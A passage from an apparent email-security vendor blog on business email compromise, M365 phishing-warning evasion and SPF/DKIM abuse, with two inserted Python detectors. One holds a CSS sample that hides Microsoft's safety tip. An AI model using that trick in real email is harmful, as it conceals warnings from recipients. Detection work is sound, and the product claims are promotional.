99.99% spam detection\r\nrate, a 99.98% phishing detection rate, and a 100% malware detection rate, with zero false positives.\r\nTitanHQ also offers a comprehensive security awareness training platform called SafeTitan. SafeTitan makes it\r\neasy for businesses to create and automate security awareness training programs for the workforce, and tailor\r\nprograms for different departments and user groups. 
The content is fun and engaging and is delivered in modules\r\nof no more than 10 minutes, which makes security awareness training easy to fit into busy workflows. SafeTitan also\r\nincludes a phishing simulator for assessing the effectiveness of training and for giving employees practice at\r\nidentifying phishing attempts, including the types of phishing attempts mentioned in this article that often fool\r\nemployees.\r\nSpamTitan and SafeTitan, like all TitanHQ solutions, are easy to implement, use, and maintain, and are available\r\non a free trial. For advice on improving cybersecurity at your business and for further information on TitanHQ\r\nsolutions, call the team today and take the first step toward improving your security posture.\r\nAI Tools Increasingly Used for BEC/VEC Attacks\r\nby G Hunt | August 27, 2024 | Phishing & Email Spam, Security Awareness\r\nBusiness email compromise (BEC) and vendor email compromise (VEC) attacks can result in huge financial\r\nlosses that can prove catastrophic for businesses, and these attacks are being conducted with increasing regularity.\r\nBEC and VEC attacks have their roots in phishing and often involve phishing as the first stage of the attack. These\r\nattacks involve impersonation of a trusted person through spoofed or compromised email accounts. The attacker\r\nthen tricks the targeted individual into disclosing sensitive information or making a fraudulent wire transfer. In the\r\ncase of the latter, the losses can be considerable. A BEC attack on a company employee at Orion, a Luxembourg carbon black\r\nsupplier, resulted in fraudulent transfers of $60 million. The employee was tricked into believing he was\r\nconversing with a trusted vendor and made multiple fraudulent transfers to the attacker’s account.\r\nBEC and VEC attacks are among the most difficult email threats to detect, as they often use legitimate, trusted\r\nemail accounts so the recipient of the email is unaware that they are conversing with a scammer. 
Since the attacker\r\noften has access to emails, they will be aware of confidential information that no individual other than the\r\ngenuine account holder should know. The attacker can also check past emails between the account holder and the\r\nvictim and can mimic the writing style of the account holder. These attacks can be almost impossible for humans\r\nto distinguish from genuine communications. Scammers often reply to existing email threads, which makes these\r\nscams even more believable.\r\nBEC/VEC scammers are increasingly turning to AI tools to improve their attacks and AI tools make these scams\r\neven harder for humans and email security solutions to identify. AI tools can be fed past emails between two\r\nindividuals and told to create a new email by mimicking the writing style, resulting in perfect emails that could\r\nfool even the most security-aware individual.\r\nSome of the most convincing VEC attacks involve the use of compromised email accounts. The attacker gains\r\naccess to the account through phishing or stolen credentials and searches through the account for information of\r\ninterest that can be used in the scam. By searching through sent and stored emails, they can identify the vendor’s\r\nclients and identify targets. They are then sent payment requests for fake invoices, or requests are made to change\r\nthe bank account information for genuine upcoming payments.\r\nDue to the difficulty of identifying these threats, a variety of measures should be implemented to improve\r\ndefenses, including administrative and technical controls, as well as employee training. 
In order to beat AI tools,\r\nnetwork defenders need to adopt AI themselves, and should implement a spam filter with AI and machine learning\r\ncapabilities, such as the SpamTitan cloud-based spam filtering service.\r\nSpamTitan analyzes the genuine emails received by the company to create a baseline against which other emails\r\ncan be measured. Through machine learning, Bayesian analysis, and other content checks, SpamTitan is able to\r\nidentify the signs of BEC/VEC and alert end users when emails deviate from the norm. An anti-phishing solution\r\nis also strongly recommended to protect accounts against initial compromise and to raise awareness of potential\r\nthreats. PhishTitan from TitanHQ incorporates cutting-edge threat detection with email banners warning about\r\nexternal emails and other threats and allows IT teams to rapidly remediate any attacks in progress.\r\nSecurity awareness training is essential for raising awareness of the threat of BEC and VEC attacks. Since these\r\nscams target executives, IT, and HR staff, training for those users is vital. They should be made aware of the\r\nthreat, taught how to identify these scams, and the actions to take when a potentially malicious message is\r\nreceived. With the SafeTitan security awareness training program it is easy to create training courses and tailor the\r\ncontent to cover threats each user group is likely to encounter to ensure the training is laser-focused on the most\r\npertinent threats.\r\nWhile spam email filtering and security awareness training are the most important measures to implement, it is\r\nalso important to strengthen defenses against phishing through the adoption of multi-factor authentication on all\r\nemail accounts, to prevent initial compromise. 
Administrative controls should also be considered, such as\r\nrequiring employees to verify any high-risk actions, such as changes to bank accounts or payment methods, and\r\nmaintaining a contact list of verified contact information to allow phone verification of any high-risk change. This\r\ntwo-step verification method can protect against all BEC/VEC attacks and prevent fraudulent payments.\r\nNew SpamTitan Release Improves Protection Against Advanced Phishing and Malware Threats\r\nby G Hunt | August 27, 2024 | Industry News\r\nTitanHQ has upgraded its award-winning SpamTitan email security solution, with the latest release including\r\nseveral enhancements to improve protection against malware, phishing, and other advanced threats. The latest\r\nrelease – version 9 – of the flagship email security solution is named SpamTitan Skellig, which includes major\r\nenhancements to the anti-spam engine at the core of the solution to improve malware detection and new phishing\r\nenhancements to protect against ever-evolving sophisticated threats.\r\nSpamTitan is a leading cloud-based anti-spam service that has been shown in recent independent tests to provide\r\nexceptional protection against spam, phishing emails, and malware. The hosted spam filter includes a next-gen\r\nemail sandbox, up-to-the-minute threat intelligence feed, AI and machine learning algorithms, twin antivirus\r\nengines, and more. In June 2024, Virus Bulletin put the new version of SpamTitan to the test and gave it\r\nVBSpam+ certification, with the solution achieving the second-highest final score in the test of 12 leading email\r\nsecurity solutions. SpamTitan successfully blocked all malware samples, only missed one phishing email, and did\r\nnot generate any false positives. 
SpamTitan had a malware catch rate of 100%, a phishing catch rate of 99.99%, a\r\nspam catch rate of 99.98%, and was given an overall score of 99.984%.\r\nThe update to SpamTitan Skellig will ensure that users continue to have best-in-class protection against email\r\nthreats but there is more to the update than protecting against threats. SpamTitan has long been popular with end\r\nusers due to the ease of use of the solution, which is why users consistently give the solution 5-star reviews. The\r\nlatest release includes a brand new UI that is even more intuitive with improved navigation and better\r\nadministrative functions across the board and makes it easier to onboard new users.\r\nThe upgraded version is available to all new users and current users can upgrade and get better protection at no\r\nadditional cost for the upgrade and no change to the subscription price, with full assistance provided with\r\nupgrading if required. You can find out more about migrating to the new version here.\r\nMicrosoft 365 Flaw Confirms Need for Layered Phishing Protections for M365\r\nby G Hunt | August 19, 2024 | Uncategorized\r\nThe latest figures from Microsoft indicate that in 2024, around 1 million businesses worldwide are using\r\nMicrosoft 365, and in the United States alone there are around 1 million users of its Office suite. 
That makes\r\nMicrosoft 365 a big target for cybercriminals, and phishing is the main way that M365 users are targeted.\r\nMicrosoft includes cybersecurity protections for its customers that can block phishing emails and malware, and\r\nthose protections do a reasonable job of blocking malicious emails; however, threats do bypass defenses and reach\r\nend users, which is why many businesses choose to augment Microsoft’s protections with third-party anti-phishing\r\nand anti-malware solutions, and now there is another good reason to bolster protection.\r\nRecent research has uncovered a flaw in Microsoft’s anti-phishing measures that allows cybercriminals to bypass\r\nits email safety alerts. Microsoft’s First Contact Safety Tip generates these warnings when a user receives an email\r\nfrom an unfamiliar email address to warn them that the email may be malicious. The email will include the\r\nmessage “You don’t often get emails from xxx@xxx.com. Learn why this is important.” That message warns the\r\nuser to take extra care and if it is not shown in the email the user may assume that the message is legitimate.\r\nThat warning message is added to the body of the HTML email and the problem with that approach is it is\r\npossible to manipulate the message by embedding Cascading Style Sheets (CSS), which is what researchers at\r\nCertitude discovered. They demonstrated that by manipulating the CSS within the HTML of the email, they were\r\nable to hide that warning. They did that by hiding the anchor tags (<a>) so the link is not displayed, changing the\r\nfont color to white, and forcing the email to have a white background, ensuring that the text is not displayed since\r\nit is also in white. While the warning is still included in the email this trick renders it invisible. 
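The CSS trick described above can be checked for on the receiving side, before a message reaches an inbox. The following is an added example, not code from the article, Certitude, Microsoft or TitanHQ: it parses an HTML email body with Python's standard-library HTML parser, locates the safety-tip wording quoted above, and reports whether the CSS reaching that text renders it invisible (display:none, visibility:hidden, zero opacity, or a text colour equal to the computed background). The class name first-contact-tip, the link target and the two sample messages are constructed for the demonstration and do not reproduce Microsoft's real markup.

```python
import re
from html.parser import HTMLParser

# Wording of the First Contact Safety Tip quoted in the article and its "Learn why"
# link text; tolerant of straight or curly apostrophes and "email"/"emails".
TIP_RE = re.compile(r"You don.t often get emails? from|Learn why this is important", re.I)
RULE_RE = re.compile(r"([^{}]+)\{([^}]*)\}")  # naive "selector { declarations }" splitter
VOID_TAGS = {"br", "img", "meta", "link", "hr", "input"}  # never pushed on the element stack

def parse_decls(text):
    """'color: #FFF; display:none !important' -> {'color': '#fff', 'display': 'none'}"""
    out = {}
    for part in text.split(";"):
        if ":" in part:
            key, value = part.split(":", 1)
            out[key.strip().lower()] = value.lower().replace("!important", "").strip()
    return out

def norm_color(value):
    """Normalise the white spellings we need to compare text against background."""
    value = value.replace(" ", "")
    return "#ffffff" if value in ("white", "#fff", "#ffffff", "rgb(255,255,255)") else value

def selector_matches(selector, stack):
    """Tag, .class or #id parts with descendant combinators, against the open-element stack."""
    def simple(sel, el):
        tag, attrs = el
        return (sel[1:] in attrs.get("class", "").split() if sel.startswith(".")
                else attrs.get("id") == sel[1:] if sel.startswith("#") else sel == tag)
    parts = selector.split()
    if not parts or not simple(parts[-1], stack[-1]):
        return False
    i = len(stack) - 2  # the remaining parts must match ancestors, innermost first
    for sel in reversed(parts[:-1]):
        while i >= 0 and not simple(sel, stack[i]):
            i -= 1
        if i < 0:
            return False
        i -= 1
    return True

class SafetyTipAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.rules, self.stack, self.reasons = [], [], []  # css rules, open elements, findings
        self.in_style = self.tip_found = False

    def handle_starttag(self, tag, attrs):
        if tag not in VOID_TAGS:
            self.stack.append((tag, dict(attrs)))
        self.in_style = self.in_style or tag == "style"

    def handle_endtag(self, tag):
        self.in_style = self.in_style and tag != "style"
        for i in range(len(self.stack) - 1, -1, -1):  # pop back to the matching open tag
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if self.in_style:  # collect stylesheet rules in document order
            for group, body in RULE_RE.findall(data):
                for sel in group.split(","):
                    self.rules.append((sel.strip().lower(), parse_decls(body)))
        elif TIP_RE.search(data) and self.stack:
            self.tip_found = True
            self.reasons += [r for r in self.hidden_reasons() if r not in self.reasons]

    def computed(self, depth):
        style = {}  # stylesheet rules selecting stack[depth], in order, then its inline style
        for sel, decls in self.rules:
            if selector_matches(sel, self.stack[:depth + 1]):
                style.update(decls)
        style.update(parse_decls(self.stack[depth][1].get("style", "")))
        return style

    def hidden_reasons(self):
        reasons, color, background = [], "#000000", "#ffffff"
        for depth in range(len(self.stack)):  # root -> text node, inheriting colours like a renderer
            st = self.computed(depth)
            for prop, bad in (("display", "none"), ("visibility", "hidden"), ("opacity", "0")):
                if st.get(prop) == bad and f"{prop}:{bad}" not in reasons:
                    reasons.append(f"{prop}:{bad}")
            color = norm_color(st.get("color", color))
            background = norm_color(st.get("background-color", st.get("background", background)))
        return reasons + ([f"text colour {color} matches background"] if color == background else [])

def audit_safety_tip(html):
    """Return (tip_present, reasons_it_is_hidden) for an HTML email body."""
    auditor = SafetyTipAuditor()
    auditor.feed(html)
    return auditor.tip_found, auditor.reasons

# Constructed samples, not real messages; "first-contact-tip" and the link target are assumed stand-ins.
TIP_BLOCK = ('<div class="first-contact-tip">You don\'t often get emails from ceo@example.invalid. '
             '<a href="https://learn.example.invalid/why">Learn why this is important</a></div>')
VISIBLE_MAIL = f"<html><body>{TIP_BLOCK}<p>Please review the attached invoice.</p></body></html>"
# The trick the article describes: white text on a forced white background, anchor hidden.
HIDE_CSS = ("<style>body { background: #ffffff; } "
            ".first-contact-tip { color: #FFF; background-color: white; } "
            ".first-contact-tip a { display: none; }</style>")
HIDDEN_MAIL = f"<html><head>{HIDE_CSS}</head><body>{TIP_BLOCK}<p>Please review the attached invoice.</p></body></html>"
```

Calling audit_safety_tip(VISIBLE_MAIL) returns (True, []) while audit_safety_tip(HIDDEN_MAIL) returns True with both "display:none" and the white-on-white reason listed. This is a heuristic, not a CSS engine: it ignores specificity and !important ordering, external stylesheets, rgba/hsl colours and off-screen positioning, so a mail gateway would treat a hit as one signal for banner injection or quarantine rather than proof, and a miss as no evidence either way.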
They also showed\r\nthat it is possible to spoof Microsoft’s encrypted and signed icons to make the email appear secure.\r\nMicrosoft has confirmed that the finding is valid but has chosen not to address the problem at this time. Microsoft\r\nhas instead marked the issue for potential resolution through future product updates, as there have been no known\r\ncases of this tactic being used in the wild and the issue was not deemed sufficiently severe to qualify for\r\nimmediate servicing.\r\nThis issue serves as a reminder about M365 cybersecurity. Microsoft produces some excellent products that are\r\ninvaluable to businesses, but Microsoft is not a cybersecurity vendor and while protections have been added, they\r\ncan be circumvented. Microsoft 365’s EOP and Defender solutions do a good job at blocking most threats, but\r\nmalicious emails do get through to inboxes where they can be opened by end users. The Microsoft 365 spam filter\r\nonly provides an average level of protection against email threats.\r\nTitanHQ has developed cybersecurity solutions to address M365 security gaps and provide greater protection for\r\nMicrosoft 365 users through the SpamTitan spam filter for M365 and PhishTitan anti-phishing solution, both of\r\nwhich integrate seamlessly with Microsoft 365 and add important extra layers of protection against phishing, scam\r\nemails, and malware.\r\nThe engine that powers the SpamTitan and PhishTitan solutions has been independently tested and confirmed to\r\nprovide superior protection through advanced features designed to catch more malicious emails. Those measures\r\ninclude a powerful next-generation email sandbox for protecting against advanced email attacks. When emails\r\npass initial checks and scans using twin antivirus engines, they are sent to the sandbox for deep inspection, which\r\nallows malware to be identified from its behavior rather than a signature. 
These solutions include AI and machine\r\nlearning protection, where malicious emails can be identified based on how they deviate from the normal emails\r\nreceived by a business, improving protection against zero-day threats – phishing and business email compromise\r\nemails that have not been seen before.\r\nThe PhishTitan solution has been developed specifically for Microsoft 365 to provide unmatched protection\r\nagainst phishing threats. PhishTitan displays banner notifications in emails to warn end users about suspicious\r\ncontent, which will provide protection should Microsoft’s First Contact Safety Tip be hidden. Links in emails are\r\nrewritten to display their true destination, and the solution makes it quick and easy for security teams to remediate\r\nphishing threats throughout the entire email system.\r\nThe engine that powers these solutions has recently been shown to outperform leading email security solutions such as\r\nMimecast on overall catch rate and malware catch rate, with far fewer false positives. In the June Virus Bulletin test,\r\nTitanHQ had a 99.99% phishing catch rate, a spam catch rate of 99.98%, a malware catch rate of 100%, and zero\r\nfalse positives. PhishTitan catches 20 unique and sophisticated threats per 80,000 emails received that Microsoft\r\n365 misses. Give TitanHQ a call today to find out more about these solutions and how adding extra layers of\r\nprotection can strengthen your business’s security posture.\r\n$60 Million Lost in Single Business Email Compromise Scam\r\nby G Hunt | August 15, 2024 | Phishing & Email Spam, Security Awareness\r\nBusiness Email Compromise (BEC) has long been one of the costliest types of cybercrime. 
According to the latest\r\ndata from the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3), almost 21,500\r\ncomplaints were received about BEC attacks in 2023 resulting in adjusted losses of more than $2.9 billion.\r\nBetween October 2013 and December 202, more than $50 billion was lost to BEC scams domestically and\r\ninternationally.\r\nWhat is Business Email Compromise?\r\nBEC, also known as email account compromise (EAC), is a sophisticated scam that involves sending emails to\r\nindividuals that appear to have come from a trusted source and making a legitimate-sounding request, which is\r\ntypically a change to bank account details for an upcoming payment or payment of a fake invoice.\r\nOne such scam targets homebuyers, with the attacker impersonating the title company and sending details for a\r\nwire transfer for a down payment for a house purchase. Businesses are commonly targeted and asked to wire\r\nmoney for an upcoming payment to a different bank account. While the scammer is usually based overseas, the\r\nbank account may be at a bank in the victim’s home country. When the funds are transferred by the victim, they are\r\nimmediately transferred overseas or withdrawn, making it difficult for the funds to be recovered.\r\nBEC attacks often start with phishing emails. The scammers use phishing to gain access to an employee’s email\r\naccount, then the account is used to send phishing emails internally. The goal is to compromise the account of an\r\nexecutive such as the CEO or CFO. That account can then be used for the BEC part of the scam. 
Alternatively,\r\nvendors are targeted, such as construction companies, and their accounts are used for BEC attacks on their\r\ncustomers.\r\nOnce a suitable email account has been compromised, the scammers search through previous emails in the\r\naccount to find potential targets – the company’s customers in the case of a vendor account or individuals\r\nresponsible for making wire transfers in the case of a CEO’s account. The attackers study previous\r\ncommunications between individuals to learn the writing style of the account holder, and then craft their messages\r\nimpersonating the genuine account owner. AI tools may also be used for this part of the scam or even researching\r\ntargets. Alternatively, email accounts and websites may be spoofed, using slight variations of legitimate email\r\naddresses and domains. The information needed to conduct the scam may be gleaned from public sources or stolen\r\nvia malware infections.\r\nFrom here, a single request may be sent or a conversation may ensue over several emails to build trust before the\r\nrequest is made. Considerable time and effort is put into these scams because the effort is worth it for the\r\nscammers. The losses to these scams can be huge. Fraudulent wire transfers are often for tens of thousands of\r\ndollars or more, and with two recent scams, the losses have been immense.\r\nTens of Millions Fraudulently Obtained in BEC Scams\r\nINTERPOL recently reported that it had successfully recovered more than $40 million stolen in a single BEC\r\nattack. The scammers targeted a commodities firm in Singapore, impersonating one of the company’s suppliers. In\r\nJuly, an email was received that had apparently been sent by the supplier requesting a pending payment be sent to\r\na new bank account, in this case, the account was based in Timor Leste. 
In this scam, the email was sent from an\r\naccount that differed slightly from the supplier’s legitimate email address. That difference was not identified and\r\nthe bank account details were changed. A payment of $42.3 million was made to the account, and the transfer was\r\nonly determined to be fraudulent when the supplier queried why the payment had not been received. INTERPOL\r\nwas able to assist with the recovery of $39 million, and seven arrests were made which also involved the recovery\r\nof a further $2 million.\r\nThere has since been an even bigger scam, and the victim was not so fortunate. The chemical manufacturing\r\ncompany Orion reported falling victim to a BEC attack that resulted in a $60 million loss. The Luxembourg firm\r\ntold the U.S. Securities and Exchange Commission (SEC) that a non-executive employee was tricked into\r\ntransferring the funds to multiple third-party accounts. So far, that loss has not been recovered.\r\nHow to Reduce Risk And Defeat BEC Attacks\r\nDefending against BEC attacks can be a challenge, as legitimate email accounts are often used and the scammers\r\nare expert impersonators. The use of AI tools makes these scams even more difficult to identify. Defending against\r\nBEC attacks requires a defense-in-depth approach to prevent malicious emails from being delivered and prepare\r\nthe workforce by improving awareness of the threats.\r\nSecurity awareness training is vital. All members of the workforce should receive training and be made aware of\r\nBEC scams (and other cybersecurity threats). Training should cover the basics of these scams, such as why they\r\nare conducted and the attackers’ aims, as well as the red flags to look for. Phishing simulations can be highly\r\nbeneficial, as BEC scams can be simulated to put training to the test and give individuals practice at identifying\r\nthese scams. 
TitanHQ’s SafeTitan platform includes BEC training material and a phishing simulator and makes it\r\neasy for businesses to improve their human defenses against BEC attacks.\r\nPolicies and procedures should be developed and implemented to reduce risk. For instance, it should be company\r\npolicy for any requested change to banking credentials to be reviewed by a supervisor, and for any requested bank\r\naccount changes by vendors to require verification by phone, using previously verified contact information.\r\nIt is vital to implement technical security measures to prevent email accounts from being compromised, malware\r\nfrom being installed, and to identify and block BEC emails. Traditional anti-spam software often fails to detect\r\nthese sophisticated threats. A standard anti-spam appliance will perform a range of checks on the sender’s\r\nreputation and may be able to detect and block spoofed emails, but generally not emails sent from legitimate\r\ncompromised accounts. Traditional anti-spam and antivirus solutions can detect known malware, but not novel\r\nmalware threats.\r\nWhat is needed is a next-generation hosted anti-spam service with machine learning and AI capabilities that can\r\nlearn about the standard emails sent and received by a company or individual and determine when emails deviate\r\nfrom the norm and flag them as suspicious. AI-based protection is needed to defeat cybercriminals’ use of AI\r\ntools. The spam filtering service should also include email sandboxing in addition to standard anti-virus protection\r\nto identify and block novel malware threats, to prevent the malware infections that are used to gather information\r\nto support BEC attacks. 
SpamTitan from TitanHQ has all these features and more, with recent independent tests\r\nconfirming the solution provides exceptional protection against phishing, spam, and sophisticated threats such as\r\nBEC attacks.\r\nThe most important thing to do is to take proactive steps to improve your defenses. Doing nothing could see your\r\nbusiness featured in the next set of FBI statistics. Give the TitanHQ team a call today to discuss the best defenses\r\nfor your business and find out more about how TitanHQ can help block BEC attacks and other cyber threats.\r\nTraining, Automation, AI, and Machine Learning Key to Reducing Data Breach Costs\r\nby G Hunt | July 31, 2024 | Network Security\r\nEach year, IBM conducts a study of data breaches to determine how much these incidents are costing businesses,\r\nthe main factors that contribute to that cost, and how attackers are gaining access to their victims’ networks. Aside\r\nfrom 2020, data breach costs have continued to increase annually, and this year is no exception. The average cost\r\nof a data breach has risen from $3.86 million in 2018 to $4.88 million in 2024 and has increased by 10% since last\r\nyear. The highest costs were incurred at critical infrastructure entities, especially healthcare organizations.\r\nBreaches at the latter were the costliest at an average of $9.77 million per incident.\r\nThe report is based on 3,556 interviews with individuals at 604 organizations who had knowledge about data\r\nbreaches at their respective organizations. The data breaches included in the report involved between 2,100 and\r\n113,000 compromised records and occurred between March 2023 and February 2024. 
The calculations include\r\ndirect costs such as the breach response, ransom paid, forensic analysis, and regulatory fines, as well as indirect\r\nexpenses such as in-house investigations, loss of business, and loss of customers.\r\nThis year’s Cost of a Data Breach Report revealed the high cost of breaches stemming from phishing, business\r\nemail compromise, social engineering, and stolen credentials, which are the costliest incidents to resolve.\r\nBreaches stemming from stolen credentials and phishing were the costliest root cause, as was the case in\r\n2023. Compromised credentials were the leading attack vector and were behind 16% of breaches, with phishing\r\nthe next most common behind 15% of breaches. In terms of cost, phishing attacks cost an average of $4.88 million\r\nand compromised credentials cost $4.81 million. Business email compromise attacks were also costly at an\r\naverage of $4.88 million with social engineering incidents costing an average of $4.77 million.\r\nThe report dives into the factors that contribute to the cost of a breach and the main areas where businesses have\r\nbeen able to reduce costs. The main factors that contributed to the cost of a breach were security system\r\ncomplexity, a security skills shortage, and third-party breaches, which are difficult things to address. Businesses\r\nhave been able to reduce breach costs by implementing a number of measures, and the two biggest factors were\r\nemployee training and AI/machine learning insights, with one constant identified being the use of AI and\r\nautomation in security.\r\nEmployee training was determined to reduce the average breach cost by $258,629, with the most important aspect\r\nof training related to detecting and stopping phishing attacks. 
If a business is targeted in a phishing campaign, it\r\nmay not be possible to prevent all employees from being fooled by the campaign, but through regular training and\r\nphishing simulations, the severity of the incident can be greatly reduced. For instance, a recent phishing attack on\r\na U.S. healthcare organization resulted in more than 50 email accounts being compromised.  More effective\r\ntraining could have prevented many of those employees from being tricked, greatly reducing the severity of the\r\nattack and the cost of remediation.\r\nAI and machine learning insights were determined to reduce the average breach cost by $258,538, a close second\r\nin terms of cost reduction. Cybercriminals are leveraging AI in their attacks, especially for phishing and social\r\nengineering attacks. Network defenders need to leverage AI and machine learning tools to help them defend\r\nagainst these attacks and identify phishing, social engineering, and BEC threats, which are becoming much harder\r\nfor humans to spot. Automation is key, especially due to the cybersecurity skills shortage – one of the leading\r\nfactors that increases breach costs. Network defenders are overworked, and automation is key to reducing their\r\nworkload, especially since it is difficult to find and retain skilled cybersecurity staff.\r\nAt TitanHQ, we understand the importance of staff training, and the benefits of AI, machine learning, and\r\nautomation and offer businesses an easy way to implement these and better protect themselves from cyberattacks,\r\nremediate incidents quickly and efficiently, and ensure that their workforce is well trained and aware of cyber\r\nthreats and how to avoid them. 
Security awareness training is provided through the SafeTitan platform, which\r\nincludes an extensive library of engaging training content to teach security best practices, raise awareness of cyber\r\nthreats, and teach employees how to recognize and avoid threats including phishing, social engineering, and\r\nbusiness email compromise.\r\nThe content is constantly refreshed to account for changing work practices, technology, and the latest tactics,\r\ntechniques, and procedures being used by cybercriminals. The phishing simulator includes hundreds of templates\r\ntaken from real-world phishing attempts to reinforce training and identify employees who fall for phishing\r\nattempts. It is quick and easy to create training courses and phishing simulations, and importantly, to automate\r\nthem to run continuously throughout the year. The platform also automatically delivers training modules to\r\nemployees in response to mistakes such as phishing simulation failures, to ensure training is delivered in real-time\r\nwhen it is needed the most and likely to have the greatest impact.\r\nTitanHQ offers two cutting-edge products to protect against email-based attacks, especially phishing and social\r\nengineering attempts. SpamTitan is a cloud-based anti-spam service (or can be provided as a gateway spam filter)\r\nthat incorporates exceptional malware protection, email sandboxing, AI, and machine learning algorithms to\r\nidentify and quarantine sophisticated threats, including novel threats that have not been seen before. In recent\r\nindependent tests, the machine learning algorithms and other threat detection features achieved a detection rate of\r\nover 99.99%.\r\nPhishTitan incorporates the same AI and machine learning capabilities to identify and block more threats in Office\r\n365 environments. PhishTitan layers extra protection on top of Microsoft 365’s EOP and Defender and provides best-in-class phishing protection. 
PhishTitan is also a remediation solution for automating the response to phishing\r\nthreats to reduce the burden on IT staff, including instant inbox threat removal of emails containing malicious\r\nURLs and tenant-wide remediation with robust cross-tenant features for detection and response.\r\nWith these solutions, businesses can improve protection, prevent data breaches, and greatly reduce costs while\r\neasing the burden on their IT staff. They are also easy to implement and use, as we understand that IT staff don’t\r\nneed any more management headaches. For more information, give the TitanHQ team a call to discuss your\r\nrequirements, find out more about the products, and arrange a product demonstration. All three products are also\r\navailable in a free trial to allow you to put them to the test and see the difference they make.\r\nMassive Phishing Campaign Defeats SPF and DKIM by Leveraging Proofpoint Misconfiguration\r\nby G Hunt | July 31, 2024 | Phishing \u0026 Email Spam\r\nA massive phishing campaign that involved around 3 million emails a day was made possible by a\r\nmisconfiguration in Proofpoint’s email servers. The vulnerability was exploited to get the emails DomainKeys\r\nIdentified Mail (DKIM) signed and approved by SPF, thereby ensuring the emails were delivered to inboxes.\r\nResearchers at Guardio identified the campaign, which ran from January 2024 to June 2024 and at its peak\r\ninvolved sending around 14 million emails a day. The purpose of the campaign was to steal credit card numbers\r\nand set up regular credit card payments. The emails impersonated well-known brands such as Nike, Disney, Coca-Cola, and IBM. As is common in phishing attempts, the headers of the emails were spoofed to make it appear that\r\nthe email had been sent by a genuine company. 
The majority of spam filters would be able to detect this spoofing\r\nand block the emails because they use Sender Policy Framework (SPF) and DKIM, specifically to detect and\r\nprevent spoofing.\r\nEmails must be sent from approved servers to pass SPF checks, and they must be authenticated using the DKIM\r\nsigning key for the domain. With DKIM, public-key cryptography is used to sign an email with a private key\r\nwhen it leaves the sender’s server, and the recipient server uses the public key to verify the source of the message.\r\nIf the From field matches the signing domain, the DKIM check is passed, and the email is determined to be authentic and will be\r\ndelivered. If not, the email will be identified as spam and will be blocked. In this campaign the emails were all\r\nproperly signed and authenticated, ensuring that they would be delivered.\r\nFor an email that impersonated Nike, a spoofed email address would be used with the nike.com domain, which,\r\nthanks to passing the SPF and DKIM checks, would be verified by the recipient as having been authenticated. The\r\nrecipient may be fooled that the email has come from the genuine company domain, and since the emails\r\nthemselves contained that company’s branding and provided a plausible reason for taking action, the user may\r\nclick the link in the email.\r\nAs with most phishing emails, there is urgency. Action must be taken quickly to avoid negative consequences,\r\nsuch as an impending charge, notification about the closure of an account, or another pressing matter. If the link is\r\nclicked, the user will be directed to a phishing site that also spoofs the brand and they are asked to provide their\r\ncredit card details. 
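The "From field matches" step in the SPF/DKIM explanation above is what DMARC calls alignment: a DKIM pass only vouches for the visible sender if the signing domain (d=) belongs to the same organization as the From domain, and an SPF pass only counts if the envelope sender domain does. The following is an added illustration of that check, not code from the original post or from TitanHQ. It assumes an Authentication-Results header in the usual RFC 8601 shape as added by the receiving server, approximates the organizational domain with the last two labels (real code should use the Public Suffix List), and reads only the first Authentication-Results header; the sample messages are constructed.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample messages (not real mail). Only the headers matter here.
DKIM_ALIGNED = """\
From: "Accounts" <no-reply@example.com>
Authentication-Results: mx.receiver.example;
 dkim=pass header.d=example.com header.s=sel1;
 spf=fail smtp.mailfrom=bounce.other.example
Subject: aligned DKIM pass

body
"""

DKIM_UNALIGNED = """\
From: "Brand Support" <support@brand.example>
Authentication-Results: mx.receiver.example;
 dkim=pass header.d=bulk-sender.example header.s=k1;
 spf=pass smtp.mailfrom=bounce@bulk-sender.example
Subject: valid signature, but it vouches for a different domain

body
"""

SPF_ALIGNED = """\
From: billing@brand.example
Authentication-Results: mx.receiver.example;
 dkim=fail header.d=brand.example header.s=k1;
 spf=pass smtp.mailfrom=bounces@mail.brand.example
Subject: aligned SPF pass

body
"""


def org_domain(domain: str) -> str:
    """Approximate the organizational domain with the last two labels.
    Production code should use the Public Suffix List (co.uk etc.)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(authenticated_domain: str, from_domain: str) -> bool:
    """DMARC relaxed alignment: both names share an organizational domain."""
    return org_domain(authenticated_domain) == org_domain(from_domain)


def parse_auth_results(header: str) -> dict:
    """Pull the spf/dkim results, and the domain each one vouches for,
    out of an RFC 8601 style Authentication-Results header value."""
    out = {"spf": None, "dkim": []}
    # The first ';'-separated clause is the authserv-id; skip it.
    for clause in header.split(";")[1:]:
        clause = clause.strip()
        m = re.match(r"(spf|dkim)=(\w+)", clause)
        if not m:
            continue
        method, result = m.groups()
        if method == "spf":
            dm = re.search(r"smtp\.mailfrom=(?:[^@\s]+@)?([^\s;]+)", clause)
            out["spf"] = (result, dm.group(1) if dm else None)
        else:
            dm = re.search(r"header\.d=([^\s;]+)", clause)
            out["dkim"].append((result, dm.group(1) if dm else None))
    return out


def from_is_authenticated(raw_message: str) -> bool:
    """True only if an SPF or DKIM pass is aligned with the visible From domain.
    A DKIM pass for some other d= domain says nothing about the From address."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2]
    if not from_domain:
        return False
    # Only the first Authentication-Results header is read (assumption).
    ar = parse_auth_results(msg.get("Authentication-Results", ""))
    spf_ok = bool(ar["spf"] and ar["spf"][0] == "pass" and ar["spf"][1]
                  and aligned(ar["spf"][1], from_domain))
    dkim_ok = any(result == "pass" and d and aligned(d, from_domain)
                  for result, d in ar["dkim"])
    return spf_ok or dkim_ok


if __name__ == "__main__":
    samples = [("DKIM_ALIGNED", DKIM_ALIGNED),
               ("DKIM_UNALIGNED", DKIM_UNALIGNED),
               ("SPF_ALIGNED", SPF_ALIGNED)]
    for name, raw in samples:
        print(f"{name}: From domain authenticated = {from_is_authenticated(raw)}")
```

The second sample is the case to keep in mind: the signature verifies, so a filter that only asks "did DKIM pass?" is satisfied, yet the key belongs to a domain that has nothing to do with the From address. In the Proofpoint campaign described above the relay signed with the impersonated customer's own domain, so even this alignment check would have passed, which is why the layered defenses discussed later in the post matter.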
